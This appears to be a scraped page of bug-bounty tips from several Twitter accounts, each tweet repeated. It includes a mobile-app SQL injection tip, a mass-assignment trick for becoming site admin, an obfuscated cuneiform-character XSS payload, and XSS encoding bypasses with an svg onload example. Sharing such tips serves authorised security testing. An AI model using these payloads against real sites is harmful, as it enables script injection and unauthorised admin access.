Moulchi(@oualilweb) 's Twitter Profile Photo

Decompiled an Android app and discovered an endpoint vulnerable to SQLi.
Don't overlook mobile apps. they can be a goldmine for juicy things

tips

Decompiled an Android app and discovered an endpoint vulnerable to  SQLi.
Don't overlook mobile apps. they can be a goldmine for juicy  things

#bugbounty #bugbountytips
account_circle
N$ ๐Ÿฅ(@nav1n0x) 's Twitter Profile Photo

I just added an extra property 'is-site-admin':true, and voilร , I became one of the site admins.๐Ÿคฃ๐Ÿคฃ๐Ÿคฃ๐ŸคŸ๐ŸคŸ

I just added an extra property 'is-site-admin':true, and voilร , I became one of the site admins.๐Ÿคฃ๐Ÿคฃ๐Ÿคฃ๐ŸคŸ๐ŸคŸ#bugbounty
account_circle
Brut ๐Ÿ‡ฎ๐Ÿ‡ณ(@wtf_brut) 's Twitter Profile Photo

๐Ÿ“ขa XSS payload, Cuneiform-alphabet based ! ๐’€€='',๐’‰บ=!๐’€€+๐’€€,๐’€ƒ=!๐’‰บ+๐’€€,๐’‡บ=๐’€€+{},๐’Œ=๐’‰บ[๐’€€++], ๐’€Ÿ=๐’‰บ[๐’ˆซ=๐’€€],๐’€†=++๐’ˆซ+๐’€€,๐’น=๐’‡บ[๐’ˆซ+๐’€†],๐’‰บ[๐’น+=๐’‡บ[๐’€€] +(๐’‰บ.๐’€ƒ+๐’‡บ)[๐’€€]+๐’€ƒ[๐’€†]+๐’Œ+๐’€Ÿ+๐’‰บ[๐’ˆซ]+๐’น+๐’Œ+๐’‡บ[๐’€€] +๐’€Ÿ][๐’น](๐’€ƒ[๐’€€]+๐’€ƒ[๐’ˆซ]+๐’‰บ[๐’€†]+๐’€Ÿ+๐’Œ+'(๐’€€)')()

tips

๐Ÿ“ขa XSS payload, Cuneiform-alphabet based !  ๐’€€='',๐’‰บ=!๐’€€+๐’€€,๐’€ƒ=!๐’‰บ+๐’€€,๐’‡บ=๐’€€+{},๐’Œ=๐’‰บ[๐’€€++], ๐’€Ÿ=๐’‰บ[๐’ˆซ=๐’€€],๐’€†=++๐’ˆซ+๐’€€,๐’น=๐’‡บ[๐’ˆซ+๐’€†],๐’‰บ[๐’น+=๐’‡บ[๐’€€] +(๐’‰บ.๐’€ƒ+๐’‡บ)[๐’€€]+๐’€ƒ[๐’€†]+๐’Œ+๐’€Ÿ+๐’‰บ[๐’ˆซ]+๐’น+๐’Œ+๐’‡บ[๐’€€] +๐’€Ÿ][๐’น](๐’€ƒ[๐’€€]+๐’€ƒ[๐’ˆซ]+๐’‰บ[๐’€†]+๐’€Ÿ+๐’Œ+'(๐’€€)')()  

#bugbounty #bugbountytips
account_circle
Sergio Medeiros(@grumpzsux) 's Twitter Profile Photo

Basic XSS Encoding Tips โฌ

1) alert = window['al'+'ert']
2) bypass () with ``
3) replace space with /
4) encode symbols:

< = %3c
> = %3e
' = %22
[ = %5b
] = %5d
` = %60

Example Payload:
%3csvg/onload=window%5b'al'+'ert'%5d`1337`%3e

tips

account_circle
HackGit(@hack_git) 's Twitter Profile Photo

OFFAT

The OWASP OFFAT tool autonomously assesses your API for prevalent vulnerabilities, though full compatibility with OAS v3 is pending. The project remains a work in progress, continuously evolving towards completion

github.com/OWASP/OFFAT

OFFAT

The OWASP OFFAT tool autonomously assesses your API for prevalent vulnerabilities, though full compatibility with OAS v3 is pending. The project remains a work in progress, continuously evolving towards completion

github.com/OWASP/OFFAT

#bugbounty #pentesting #redteam
account_circle